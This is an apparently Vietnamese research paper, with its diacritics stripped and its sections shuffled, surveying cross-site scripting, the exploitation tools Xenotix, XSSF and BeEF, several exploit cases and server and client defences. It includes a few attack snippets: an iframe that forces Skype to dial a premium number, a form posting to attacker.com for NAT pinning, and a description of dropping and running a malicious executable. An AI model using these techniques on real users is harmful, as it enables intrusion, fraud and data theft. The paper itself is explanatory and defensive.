KS. Nguyn Ngc Qun T NCPT An ton thng tin Tm tt: XSS (Cross site scripting ) l mt l hng ng dng web trong mt ngi dng cui c th tn cng bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. L hng XSS tn ti t lu nhng kch bn hin nay vn c th thc hin vi nhng kiu tn cng mi trong tng lai. Bi vit ny trnh by mt nghin cu chuyn su trong s nguy him ca l hng XSS v cch khai thc l hng, n cng gii thiu cc bin php khc phc cc cuc tn cng XSS. 1.
Phn 4 cung cp m t v mt s l hng bo
mt mi v th v c tm thy trn cc trang web gn y v lm th no c th khai thc . Trong Phn 5 , bi bo lit k mt vi bin php khc phc c th c thc hin trn pha my ch cng nh trn cc client bo v mt trang web hay ng dng t cc l hng XSS v cui cng l kt lun..
GII THIU
Vi s ra i ca cng ngh pht trin
web ng, cng vi vic s dng ngy cng nhiu cc ng dng web th cng gy ra nhiu l hng hn cho Web. Cross Site Scripting (gi tt l CSS hay thng l XSS) l mt trong nhng cuc tn cng tim m ph bin nht. XSS l mt l hng da trn vic tim m - (Injection) c tm thy trong cc ng dng web trong cc m c hi c tim nh cc bin u vo vo payload. Khi ngi dng hp php truy cp vo mt ng dng web b ly nhim , cc m c hi c lp li cho trnh duyt ca ngi dng. M tim c kh nng c , thay i v truyn ti d liu c phn loi truy cp bng trnh duyt nh cookies, session tokens.
2.
NI DUNG NGHIN CU
y, bi bo trnh by mt phn tch
ngn gn v cc framework ph bin khc nhau m tn ti cho vic pht hin ra cc l hng XSS trong cc ng dng web, v cch khai thc chng. Chng lm vic bng cch injecting cc payload v chy cc script trn l hng web. 2.1. Xenotix
XSS (Cross- site Scripting (XSS) OWASP ) l mt l hng l tn ti t lu .
Mt ci nhn chi tit hn v XSS c tham kho ( Shanmugam & Ponnavaikko , 2008). XSS l mt l hng trong top 10 l hng hng nm ca OWASP. Trong bi bo ny tp trung chnh khai thc XSS, l cc cuc tn cng c th c thc hin sau khi l hng XSS c tm thy hoc kt hp vi cc cng c khai thc. Trong bi bo ny , u tin bi bo trnh by cc tnh nng c bn ca XSS, mt s cch pht hin XSS ph bin v cc cng c khai thc l hng XSS trong Phn 2. Trong phn 3, bi vit m t cc loi XSS: Non-Persistent or Reflected Vulnerability; Stored or Persistent vulnerability; DOM based or Local XSS.
Xenotix (Abraham , 2012 ) v c bn l
mt cng c kim tra thm nhp c s dng khai thc bi XSS. N c mt danh sch payload c xy dng, c hn 450 payload XSS, m chng c th vt qua cc b lc XSS c bn c s dng bi cc nh pht trin web. N c th s dng cc payload mt cch manual hay ch t ng. ng thi N c th hot ng nh mt key logger lu li t hp phm c thc hin bi ngi dng khi ngi truy cp vo trang b nhim.K tn cng cng c th ti v mt tp tin thc thi m c trn h thng ca ngi dng m h khng nhn thc c vic . Khi ngi dng truy cp cc trang b nhim, java applet client.jar 301
s truy cp vo ca s lnh ca h thng ca
h. Attacker s dng lnh echo vit cc script c tn winconfig.vbs trong th mc ( % temp% ) v sau cmd.exe s thc thi winconfig.vbs ti v tp tin thc thi c hi theo quy nh ca k tn cng trong URL vo th mc temp v i tn n thnh update.exe, cui cng n s thc hin update.exe. Mt l hng khc c cung cp bi Xenotix l ci t mt reverse shell ( Hammer , 2006) ti h thng ca ngi s dng truy cp vo my tnh ca h.
Ltd , 2012 ) ngi ta c th chy bt k trnh
duyt da trn vic khai thc mt trang web c l hng XSS c c session Meterpreter ca n gn quyn truy cp h thng. Mt tnh nng khc ca cng c ny l XSSF tn cng t ng trong khai thc khc nhau c th c thm vo trong mt hng i , mi id cng vic ring ca mnh v c th c thc hin t ng mt khi nn nhn thm lin kt c l hng c cung cp bi nhng k tn cng.
Mc d l mt cng c n gin, nhng
y l mt cng c ng c quan tm. Tnh nng keylog khng c duy tr nhiu v n ch c th capture c bn trong trang b nhim. Nu ti v a th ch chy c 16 bit h tr cc file exe.
Mt mt XSSF cung cp nhiu tnh nng
tuyt vi nh mt cng c thnh cng cho cc tn cng Post XSS, mt khc n li khng cung cp mt s lng ln cc phng tin pht hin cc l hng XSS. ng thi lm vic vi XSSF framework cng vi cc hiu bit ca Metasploit.
2.2. XSSF
2.3. BeEF
XSSF c m t r trong ( Tomes ,
2011) (htt1) v (xssf - Cross-Site Scripting Framework - project Google Hosting) nhm mc ch a ra nhng mi nguy him tim tng lin quan n cc l hng XSS.Cng vic c bn ca n bao gm vic to ra mt knh thng tin lin lc (c gi l mt tunnel XSSF ) vi trnh duyt mc tiu (trong c mt l hng XSS ) thc hin cc cuc tn cng khc nhau. K tn cng c th thc hin cc cuc tn cng khc nhau, mi cuc tn cng tn ti trn mt module ring bit. Mt s lng ln cc mun nh: file stealer, iphone Skype call, network scanning v nhiu l hng tn ti khc c th c thc hin khai thc cc l hng ng dng web ny. XSSF c bn hot ng bng cch to ra mt ng hm lit k tt c cc id ca nn nhn khi nn nhn n trn mt trang web c l hng XSS. Nhng k tn cng sau kim tra trnh duyt ca ngi dng, tm kim cch khai thc ph hp, thc hin n v gi mt phin cho ngi dng. Sau n c th truy cp vo h thng ca ngi dng. Cc cuc tn cng XSS c th c thc hin bao gm vic to ra mt ng hm XSSF c th cung cp truy cp ca cc my ch cc b ca my tnh t xa cho k tn cng v cho php hn c c chc nng ca n. ng thi s dng XSSF c tch hp vi giao din iu khin Metasploit ( Offensive Security
BeEF l vit tt ca Framework trnh
duyt khai thc. N l mt cng c kim tra thm nhp mnh m cho trnh duyt web. N s dng vector pha khch hng khc nhau nh gi cc gc an ninh thc t ca mi trng mc tiu. Framework ny bao gm cc m-un lnh khc nhau, s dng n gin v mnh m cc API gp phn hiu qu vo vic nh gi. N cho php pht trin nhanh chng v d dng s dng cc mun. BEeF kt hp mt hoc nhiu cc trnh duyt web a ra cc m-un lnh, o din cc cuc tn cng chng li h thng t bn trong ca trnh duyt. Cc trnh duyt khc nhau c kh nng nm trong bi cnh an ninh ( context security) khc nhau, v mi bi cnh c th c mt tp hp cc hng tn cng c th. Framework cho php kim tra xm nhp chn cc module c th (trong thi gian thc) nhm mc tiu mi trnh duyt, v trong mi bi cnh (context). BEEF framework l mt cng c mnh m c th s dng cc l hng XSS khi ng cc cuc tn cng khc nhau nh mt vi tn c k ti sau y: browser fingerprinting (thu thp thng tin v trnh duyt), persistence , network fingerprinting, DNS enumeration, Port scanning, v IRC NAT.
302
3.
Cc trnh duyt sau thc thi m v n n
t mt my ch trusted
CC LOI TN CNG XSS
Hin nay c 3 loi tn cng cross site
scripting ph bin: Non-Persistent or Reflected Vulnerability (Tn cng Reflected hoc cross site scripting khng lin tc); Stored or Persistent vulnerability; DOM based or Local XSS Nhng l hng tn ti trn nhng website khc nhau hoc cc ng dng web c th c phn loi thnh 3 loi. Chng c gii thch v m t chi tit nh sau:
Hnh 2. Stored or Persistent vulnerability
Stored or Persistent vulnerability (hnh 2) cho php nhng tn cng mnh nht, trong cc m c hi c gi n mt trang web, ni n c lu tr trong thi gian nht nh (trong mt c s d liu, h thng tp tin, hoc bt k u) v sau hin th cho ngi s dng trong mt trang web trang web m khng c m ha bng cch s dng cc thc th HTML. Mt v d v mt tnh hnh nh vy l vi bng tin trc tuyn, ni m ngi dng c php ng bi nh dng HTML cho ngi dng khc c.
Hnh 1. Tn cng Reflected hoc cross site
scripting khng lin tc Cc cuc tn cng khng lin tc (Hnh 1) c thc hin khi d liu c cung cp bi mt khch hng web c s dng ngay lp tc bng server-side script to ra mt trang kt qu cho ngi dng. Nu d liu ngi dng cung cp khng cn gi tr v c bao gm trong cc trang kt qu m khng cn m ha HTML, vic ny cho php m pha my khch c tim vo trang nng ng. M tim c th c phn hi trn my ch web, nh trong kt qu tm kim, hoc nh mt thng bo li, hoc bt k thng ip tr li nh vy m bao gm mt phn ca u vo gi n my ch nh mt phn ca yu cu. Cc cuc tn cng Reflect c th c gi n ngi dng thng qua mt con ng khc, nh trong mt e-mail thng bo, hoc c th trn mt s my ch web khc. Khi mt ngi dng b la click vo mt lin kt c hi hoc submit mt form c bit, m tim i n my ch web c l hng, reflect cuc tn cng ngc tr li trnh duyt ca nn nhn.
Hnh 3. DOM based or Local XSS
Da trn DOM (Document Object Model) (hnh 3) hoc Local XSS, k tn cng 303
nhng d liu tn cng trong cc side client,
t bn trong mt vi trang trn my ch web. V d, nu mt phn ca JavaScript truy cp mt URL yu cu cc tham s v vit mt vi HTML trn trang ring ca mnh, vic s dng thng tin ny m khng c m ha bng cch s dng cc thc th HTML, th c th s xut hin l hng XSS, khi m vn bn d liu ny s c ti gii thch bi cc trnh duyt nh HTML m c th bao gm thm cc script pha my trm. 4.
Skype. ng dng Skype c pht trin cho
iOS s dng mt tp tin HTML c lu tr local hin th tin nhn chat t ngi dng Skype khc, nhng n tht bi trong vic m ha "Full Name" ca ngi dng n (incoming users), cho php k tn cng thc thi m JavaScript c hi khi nn nhn xem tin nhn. Vn y l thc hin khai thc bng cch s dng trnh duyt nhng Webkit. Ngoi ra cc nh pht trin Skype thit lp cc chng trnh URI cho trnh duyt nhng "file :/ /" cho php k tn cng truy cp h thng tp tin v c bt k tp tin c th c c bi cc ng dng iOS sandbox.
CC TN CNG KHAI THC XSS
4.1. D liu trn Android c nhiu l
hng Cc l hng c gii thch y (Cannon 2013) tn ti trong framework Android 2.2. N c th c khai thc truy cp cc tp tin c lu tr trong SDcard ca cc thit b chy Android. Cc Trnh duyt trn Android khng nhc nh ngi dng khi ti v mt tp tin, v d nh mt tp tin nh "payload.html" c t ng ti v / sdcard / download / payload.html. Mt JavaScript c th c s dng m file " payload " mt cch t ng m l nguyn nhn trnh duyt hin th cc file local v cho php cc cch thc c th truy cp vo SDcard v cc tp tin c lu tr bn trong . Sau , N c th gi ni dung ca cc tp tin truy cp tr li trang web c l hng.Vic khai thc n gin l s dng JavaScript v chuyn hng, n c th c s dng trn nhiu thit b cm tay v cc phin bn khc nhau ca Android. Nhng n cng c mt vi hn ch nh tn v ng dn ca tp tin c truy cp c bit n trc . V n khng phi l mt l hng root nn n khng th truy cp tt c cc tp tin, m ch c nhng g c lu tr trn SDcard.
Trong tng lai, Cn hn ch cc ng
dng ca bn th ba thc hin cc hnh ng c xc nh bi URL cng nh URI cho php cc trang web nhng mt iframe m buc Skype m ra(nu n c ci t) v gi mt s c th. JavaScript <iframe src="skype://1900expensivepremiumnumber ?call"> </ iframe>. 4.3. HTML5 API for cross domain calls L hng ny ch c th c khai thc trn cc h thng Windows. HTML5 c hai API thc hin cuc gi lin min - Cross Origin Requests v WebSockets. Bng cch s dng chng, JavaScript c th to ra cc kt ni ti bt k IP no v vi bt k cng (ngoi cng b chn), lm cho chng mt i tng l tng cho tn cng port scanning. Cc API c th b khai thc xc nh xem nu cc cng ang c kt ni l m hay ng hay lc. N nh vy bng s gip ca hai thuc tnh: 'ready state' cho bit tnh trng ca cc kt ni ti mt thi im nht nh v "'time duration' m mi "readyState" l gi tr cui. Do bng cch quan st s khc bit trong hnh vi chng ta c th xc nh bn cht ca cc cng. L mt cp ng dng qut thnh cng ca n cng ph thuc vo bn cht ca cc ng dng ang chy trn cc cng mc tiu. Khi mt yu cu c gi n s loi ng dng m chng c yu cu v gi im lng gi cho socket open, c th c nhiu u vo hoc u vo trong mt nh dng c th. Nu mc tiu ang chy mt ng dng nh vy th tnh trng ca n
4.2. Skype's improper URI scheme and
embeddable Webkit browser on IOS L hng ny nh c gii thch trong (Kumar, 2011) v (Purviance, 2011) v (iPhones Make Automatic Skype Calls | Security Generation, 2010) tn ti trong framework ca iOS. N c th b khai thc bi mt k tn cng truy cp vo c s d liu SQLLite Address Book ca ngi dng v cng t cuc gi trc tip s dng 304
khng th c xc nh. V ngay c khi
cng ng c th vn c xc nh chng ta c th m rng k thut ny thc hin cc chc nng qut mng cng nh pht hin IP ni b.
4.6. File API in HTML5
L hng ny hin ang c thc thi trong Webkit (mi nht ca Google Chrome) v c th b khai thc chuyn i trnh duyt chrome Google vo mt file server. File API trong HTML5 cho php cc JavaScript truy cp cc file, mt khi n c la chn bi ngi s dng (tc l trc khi ti ln n). Ngoi vic cung cp kinh nghim cc file upload tt hn, n cng c th c s dng mt cch c hi nh l n cp cc file ca bn trong tn cng XSS. Vi phong cch thng minh bn c th n inputtype=file iu khin ngi dng khng h bit rng anh ta s ti ln cc tp tin. Trong trng hp ny cc tp tin c la chn bi ngi s dng trong 'Open File' hp thoi l ngi duy nht c th c truy cp. Tuy nhin inputtype=directory file l mt tnh nng tuyt vi cho php ngi dng ti ln ni dung ca mt th mc c la chn, nh vy cho php truy cp ton b th mc cho k tn cng.
4.4. HTML5 implementation of AJAX
history HTML5 c mt tnh nng cho php ngi dng truy cp cc trang web khc nhau v lin kt trong mt trang web m khng thay i URL. N c thc hin vi s gip ca chc nng window.history.pushState (). N c to ra cho cc trang web AJAX sa i d dng trong thanh a ch ca s v lch s thao tc. l mt tnh nng tuyt vi v thun tin cho cc nh pht trin - v d, cc ng dng AJAX c th d dng h tr tr li v nt bm pha trc m khng cn n URI nh danh on (#). Nhng n cng c th c khai thc cho mt trang web c l hng XSS v n cho php k tn cng chuyn hng ngi dng n bt k lin kt m khng thay i URL trong thanh a ch.
4.7. XSS MAP
Google trong khi thu thp d liu cho cc Xem Google Street cng thu thp d liu ca cc mng khng dy trong vng ln cn v a ch MAC ca cc router v sau phi hp nh x chng vo GPS. y, nh xy dng trong (Higgins, 2010), mt XSS khai thc c th c s dng lp bn v tr ca ngi dng. Vic khai thc XSS c th ly a ch MAC ca router ca mc tiu v sau phi hp s dng Google Maps xc nh GPS. Mt trang c hi bn ang truy cp c th thc hin mt XSS khai thc v phc hi ca bn ta GPS t Google Maps. Cc b nh tuyn v trnh duyt web t chng khng cha bt k d liu v tr a l / GPS v khng ca n Geo v tr da trn IP. N hot ng thng qua Router XSS m c c a ch MAC ca router thng qua AJAX . a ch MAC sau c gi n k tn cng s chuyn n n a im Da dch v ca Google m c th bn v tr (GPS gn ng ta ) ca mt ngi s dng da trn a ch MAC ca mnh.
4.5. Access to the WScript ActiveX
control in Internet Explorer Cc thit lp bo mt trong Internet Explorer php truy cp vo iu khin ActiveX WScript thng qua ngn ng script nh JavaScript v VBScript. Cc mu ng dng cho thy lm th no s dng i tng ActiveX "WScript.shell" tng tc vi my ca khch hng. Vi vic kim sot ai c th thc hin cc lnh tng t nh mt du nhc trnh bo m khng thng bo cho ngi s dng. S dng Shell ngi ta cng c th to, xa v sa i cc tp tin vn bn thng qua WScript.FileSystemObject. IE7 a vo mt iu khin bo mt mi c gi l "ngun d liu truy cp trn ton min", m by gi bng cch mc nh c thit lp nhc nh ngi dng nu h mun cho php kch bn ca bn ni chuyn vi domains khc (n xem xt h thng tp tin nh l mt min ring bit ) nhng ngi ta c th vit mt kch bn tp tin trc tip vo a v sau thc hin n, nhn c xung quanh cc iu khon IE7.
4.8. NAT PINNING - IRC Over HTTP
Trong cuc tn cng XSS, mt trang web buc router ca ngi dng hoc tng 305
la, khng bit rng ti chng, forward n
cng bt k s cng tr li my ca ngi dng. Khi nn nhn nhp chut vo mt URL XSS c l hng c mt hnh thc n kt ni vi http://attacker.com:6667 (port IRC), ngi dng submit form m khng bit. Mt kt ni HTTP c to ra bi k tn cng ti my ch IRC ( kt ni gi) ch n gin l lng nghe. Router ca nn nhn nhn thy mt " kt ni IRC " (mc d khch hng ca mnh ang ni trong HTTP) v mt n lc ti mt ' DCC Chat . Direct Client- to-Client (DCC ) l mt tiu giao thc IRC lin quan cho php trao i cc tp tin v thc hin cc cuc tr chuyn khng chuyn tip bng cch cho php cc Peers kt ni vi nhau bng cch s dng mt my ch IRC cho tn hiu bt tay.Chat DCC yu cu m mt cng local trn my trm m c kt ni ngc t. Khi m router l ngn chn tt c cc kt ni t bn trong, n quyt nh chuyn tip lu lng n cng Chat DCC ngc v my ca nn nhn cho php NAT traversal cho nhng k tn kt ni tr li v tr chuyn vi anh ta. Tuy nhin, k tn cng c ch nh cng . V d, cng 21 (FTP) , cc cng router chuyn tip 21 tr li h thng ni b ca nn nhn. K tn cng c mt con ng r rng kt ni vi cc nn nhn trn cng 21 v khi ng mt cuc tn cng.
b thnh nn nhn ca XSS. Cc c ch ngn
nga (XSS (Cross Site Scripting) Cheat Sheet - OWASP, 2013) c th c thc hin mt trong hai pha my ch hoc pha khch hng. 5.1. Server Side protection bo v khi cc l hng XSS, cc bin php sau y c th c thc hin bi nh pht trin ti pha my ch. Cc khi nim c bn s dng y l, khng tin tng vo u vo cung cp (bao gm c cc tp tin cookie) ca ngi dng. Ngi s dng cn c xc nhn v xc nhn trc khi cho php truy cp vo n. Bo v c th c thc hin bng cch hn ch cc min v ng dn chp nhn cookie, thit lp chng nh HttpOnly, s dng SSL v khng bao gi lu tr d liu b mt trong cc cookie. C th v hiu ha vic s dng cc Script mt cch an ton t cc trang web khch hng. Cc Header ni dung Chnh sch An ninh cng c th c s dng bo mt chng li vic khai thc l hng XSS. Ngoi ra, m ha mt cch thch hp cc k t iu khin HTML, JavaScript, CSS, v URL nn c thc hin lm cho chng v hi trc khi chng c hin th trong trnh duyt. S dng cc b lc c lm sch u vo ngi dng: filter_sanitize_encoded ( m ha URL), htmlentities (lc HTML), ilter_sanitize_magic_quotes (p dng addslashes ()). Cc b lc ny gi mt chic ng h u vo ngi s dng v kim tra javascript hoc HTTP POST trong cc u vo v sau ngn chn cc script c thc thi. Ngoi nhng bin php c mt s th vin bo mt c sn m ha ngi dng nhp vo nh Project OWASP Encoding c sn ti Google Code, cc lc HTML hoc Htmlawed cho PHP Anti-XSS Class. Cc ng dng thun AntiSamy API cho Net hoc. XSS-HTML -B lc cho Java.
4.9. Browser Exploits
Bt k ai c th khai thc cc stack ng dng trnh duyt v thc hin mt m shell hoc m mt phin Meterpreter bng cch s dng li b nh lin quan n l hng XSS. Nhng l hng khc cng c th tr v phin Meterpreter m khng tn cng cc ng dng stack mt cch trc tip. V d nh java applet ca k t c th c s dng download cc m c v thc hin mt tp tin exe. 5.
BIN PHP KHC PHC XSS
Trong cc ng dng web th gii ngy
nay ang c ph bin rng ri cung cp cc dch v trc tuyn khc nhau. Nhng ng thi l hng ng dng ang c pht hin v cng b vi tc ng bo ng. Trn th gii, bo mt web c th d dng b xm nhp, bo mt s tr thnh bt buc bo v mnh khi cc cuc tn cn. Cc bin php khc nhau c th c p dng trnh
5.2. Endpoint Protection
Ngi dng c th thc hin cc bc ngn chn tr thnh nn nhn ca cross-site scripting bng cch ci t add-ons trnh duyt khc nhau. Nhng add ons gi mt chic ng h trn cc trng u vo khc nhau (form, URL, vv), nu mt JavaScript 306
hoc HTTP POST l gp phi, n sau s
dng cc b lc XSS ngn chn nhng script thc hin. V d v cc tin ch bao gm NoScript cho FireFox; NotScripts cho Chrome v Opera trong khi Internet Explorer 8 c chng nh l mt tnh nng c xy dng t trc. 6.
tn cng XSS ng thi gii thch cc khi
nim ng sau chng. Trong kt lun lit k mt vi c ch bo v c th c thc hin hoc trn server hoc client bo v mnh khi cc cuc tn cng XSS. 7.
phn khng th thiu ca cuc sng ca chng ta. Nhng cc trang web ny thng tn ti nhiu l hng v d b tn cng. Bi vit ny khm ph mt trong nhng l hng tn ti mt cch ph bin v ch ra cch khai thc n . XSS l mt cuc tn cng tim m tin chi phi c th hnh thnh cc c s khai thc rt mnh m. N thng c th c kt hp vi cc l hng khc thc hin cc cuc tn cng quan trng hn na. Trong bi bo ny, tho lun mt vi cuc tn cng ph bin. Chng ti lit k mt vi cng c pht hin XSS v khai thc l hng XSS, cng vi cc tnh nng chnh ca chng. Hn na chng ti cp ti mt vi l hng XSS mi nht cng nh cc cuc
Thng tin tc gi:
TI LIU THAM KHO:
2. Abraham, A. (2012). Detecting and
Exploiting XSS with Xenotix XSS Exploit Framework. 3. Cannon, T. (2013, november 23). Android Data Stealing Vulnerability | thomascannon.net 4.
Cross-site Scripting (XSS)- OWASP .
(n.d.). Retrieved February 2013, from www.owasp.org.